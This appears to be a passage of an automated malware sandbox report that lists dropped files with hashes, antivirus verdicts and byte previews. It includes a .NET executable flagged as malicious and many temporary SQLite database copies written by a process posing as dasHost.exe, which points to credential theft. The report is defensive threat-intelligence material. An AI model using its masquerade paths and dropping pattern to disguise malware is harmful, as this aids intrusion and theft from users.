                                                                        SHA-512:D83F250FE8A422C2A9DC10F1AE4FD950C919B1EA986E59CFC0AFB15D9FA9E36BD1CC3607E4514BEC7A2E1D0FBADF7D5EBA2A0C81CAFCF11B959A42A40F501F38
                                                                        Malicious:false
                                                                        Preview:27tpAGQqaSiRIH02ZcYO4OvsIPALKSyStjAp6Nze0vUEFiZL1MLl66VoLBhuFFfIdQhiGL6Lm3XI4qnj0yU7GNVxOWd5qFYvPLlyA0FqQA8DiMueX73RuhCQ5uUurAfhfl3sFyjAtorFOSOCm8htLHAsIV3QgU8Pfbh6SBYjY3hG06BmgRIsdwWXkLju4SdYpbkwuRtkk7URk42MTQtOMQvtFKVHbooFaIaYVP2OihIfbExqTXbnjPLZp1r

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x195ddda4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.4222038800358537
                                                                        Encrypted:false
                                                                        SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                        MD5:543BC5D1B938C25A863FEC34F025664D
                                                                        SHA1:1E750CDB7F9DC99AB289386EAB5A1DD7EF0BFBCD
                                                                        SHA-256:2DC4ADFBB21F9C8CBC03ECDE00F591F1ACA65B105BE2AAD1CED31A5A8BDD46E0
                                                                        SHA-512:0770A5B4B66B3D7BB5DBE068D530505C27AB561025D3748A4B9884EA497AB28CE4646AE9DDD6CF6DD99064356C403A655ADD71B78BB618B603130286FA2F80CD
                                                                        Malicious:false
                                                                        Preview:.].... .......A.......X\...;...{......................0.!..........{A."*...|q.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................qx.#*...|....................;4"*...|q..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\ssh\AaHCyFZRuOMjGDqdgJ.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....uig................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B.......................H...........`...........$................................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{}...:....& ....8........0.......... ........8........E....d...................8_...~....:.... ....~....{....:....& ....8....~....(U... .... .... ....s....~....(Y....... ....8.......... ....~....{....:i...& ....8^...r...ps....z*....~....(]...~....(a... ....?.... ....~....{a...9..

                                                                        C:\ProgramData\ssh\dd5be8a07a6153

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with very long lines (447), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):447
                                                                        Entropy (8bit):5.838557754908732
                                                                        Encrypted:false
                                                                        SSDEEP:12:XtrCClGOO55RmFad1hmgw/HuKL2GrkXy/Wl:XtZlGN8CXXoBL2PLl
                                                                        MD5:470BFDEB64ADBD865CBC1911AFD82D30
                                                                        SHA1:24320C7EC1444A0C33C348D32DB4AF41D32EE476
                                                                        SHA-256:2D3A47D596FB1674A617529F9CD3C3B60801AABCB92B9AE41D3415D14AEFBD46
                                                                        SHA-512:BC3CF8F1337F94B7038AC1C797D9E346D27A0CF0139DA558B2584249C26296443C1A83B3D819D0F44C3D81F68A48A5EC6F370C54A6D64F9787CCB95B583E4989
                                                                        Malicious:false
                                                                        Preview:Pu7tVMmjDyqoHWn20QoHER4N9PUVSkRJgNz3evXbs3rBOKh0Hu0vBYW70utG1RQcggI4gtYE2MZKk28yrdNiugHI02DuBRkbnOerCnTXWv2z8LW7v4YXDrrAZ9DoqnCkm7hWYQvEK0L9nSJofF9H3MX5geSDjoqssSMAoAjeIUNMfsWGzYJlo5raklz38sefKdQVFIAffe8i8KayHMNLfFDxkwaDKpga0sCCbBArYnFJ6JbZLAwveT9FZduTr7Uz8isQIXXGLgw1930bUB2K3u5hs7m7Qr9bTQLYaLRxnpk7gIFfmT8qFK6OnLiKuZ0ehVitscAJuEgNK7Ak1HV6sSWJT6uPmGDOzFaLjWxKTz6AntEpK8SnE3vP9ZZwruhnBSXEhzAfTKn3WVfk2FEnxZK6TKLK7BciSS9VV9IV8xT3P22n3y3mp3zlHbuWnzh

                                                                        C:\Users\Default\Pictures\AaHCyFZRuOMjGDqdgJ.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....uig................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B.......................H...........`...........$................................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{}...:....& ....8........0.......... ........8........E....d...................8_...~....:.... ....~....{....:....& ....8....~....(U... .... .... ....s....~....(Y....... ....8.......... ....~....{....:i...& ....8^...r...ps....z*....~....(]...~....(a... ....?.... ....~....{a...9..

                                                                        C:\Users\Default\Pictures\dd5be8a07a6153

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with very long lines (392), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):392
                                                                        Entropy (8bit):5.854868294174625
                                                                        Encrypted:false
                                                                        SSDEEP:6:6Gi7SAS/oivLKVsBCczCZdgGB+uMYMVW/297DxlSoCmJ2lNoLAOYhqGOK:fTRCutfVb7tV2lsA5qGl
                                                                        MD5:3131B0900B5ED77C0604A125F13DFAB6
                                                                        SHA1:E23F38391E0E02D7324B0BD85CEF6BF54EAFF36A
                                                                        SHA-256:8FEBCD06DA0AD7CAAFA221E3D5DC56A4CD9F15E617F9D36CE75F95B8BE359029
                                                                        SHA-512:2D6A047F05086319C9486C673EE1885D3A59571509C35615A3ACF3330CE1AE41370EA247B91919CD50F799AEE6F035BEC0278AFEF229165D543CDCE2C32EAC75
                                                                        Malicious:false
                                                                        Preview:YVUZLW7DAgxWXuNMphPF7kO3vOjkC8b2Kag7vTPtYfHCJusspZAs6QayHbo7xXBBE4L7OPbWSgrbdMuAf04m7s54As0ToR5AeG7OjveZ8oaai8U4rnb7cYDV9R6gYHrAkq6XOgbuWeoTRfVBX5mBz8hGClOSy7B06a01C7qKMrl8utDd55JdeqLmJ0UmRJ6YdxW1pd9ZPbyIXjVSivW2yhVQPNsLnD3DuMe6XMyb6tNC1CPjeBEgwDj5bGmbvxvLivXKEZ5W646EUSYM8Jql9XQqnjeQjXqI8CeGpEeFGsj1HelIsacmGKMKeqhf4pwiOxGSxRh3olfQxYjI7WiI5EBxzUl8h8Lb5BnTXTUa3i7fo5WGHYiiGonJwScdqiWpaEVwvPuo

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HyperPortContainerproviderinto.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):1179
                                                                        Entropy (8bit):5.354252320228764
                                                                        Encrypted:false
                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
                                                                        MD5:074445AD437DEED8A22F11A846280CE2
                                                                        SHA1:23025D83D7C33396A5F736FC6F9945976CFCD5D1
                                                                        SHA-256:B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
                                                                        SHA-512:440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):19253
                                                                        Entropy (8bit):5.005753878328145
                                                                        Encrypted:false
                                                                        SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                        MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                        SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                        SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                        SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                        Malicious:false
                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                        MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                        SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                        SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                        SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                        Malicious:false
                                                                        Preview:@...e................................. ..............@..........

                                                                        C:\Users\user\AppData\Local\Temp\0TE9VvSpQ5

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\0UOUI9enbD

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\0YakazRHK8

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\0ZWwZDkB5s

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\0lyeluLFZn

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\0t5GqOJQq7

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\0yHXFkjtsY

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\1ESGlLqnCz

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\1KLdPIVqGz

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\1sVlRsPS3o

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\246E22mXIF

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\2WhfYytC0t

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\2knRPxQWJk

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
